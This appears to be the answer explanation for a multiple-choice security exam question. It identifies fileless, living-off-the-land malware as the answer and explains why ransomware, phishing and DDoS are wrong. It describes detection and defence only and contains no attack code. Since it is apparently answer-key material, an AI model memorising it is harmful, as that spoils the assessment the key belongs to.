Fileless malware resides primarily in memory and uses legitimate administrative tools such as PowerShell, WMI, or Office macros to perform malicious actions, leaving minimal traces on disk. The scenario describes obfuscated scripts communicating with external IP addresses, indicative of an attacker leveraging living-off-the-land (LotL) techniques to execute tasks such as data exfiltration, lateral movement, privilege escalation, or command-and-control communication.

Detection requires behavioral monitoring, endpoint detection and response (EDR), and memory forensics. Analysts should look for anomalies such as unusual process execution, unexpected network connections, abnormal script behavior, and deviations from baseline activity. Mitigation involves isolating affected endpoints, terminating malicious processes, analyzing scripts for malicious intent, and remediating compromised systems. Preventive measures include application whitelisting, enforcing least privilege, enabling PowerShell logging (module logging, script block logging, transcription), restricting script execution policies, network segmentation, and leveraging threat intelligence to block communication with known malicious IP addresses or domains.

Living-off-the-land attacks are particularly challenging because they exploit legitimate tools, making signature-based detection largely ineffective. A layered defense combining proactive monitoring, robust endpoint security, least privilege enforcement, and employee training is essential for minimizing the risk and impact of fileless malware attacks. Organizations should also maintain incident response procedures and forensic capabilities to respond effectively when such threats are identified.

B Standard ransomware encrypting files

Ransomware involves file encryption and ransom notes, which differs from memory-resident malicious script execution.

C Phishing emails delivering malicious attachments

While phishing may be an initial delivery method, the ongoing obfuscated execution indicates post-compromise activity typical of fileless malware.

D Distributed denial-of-service (DDoS) attack

DDoS attacks focus on service disruption and do not involve memory-resident scripts or external command-and-control communications.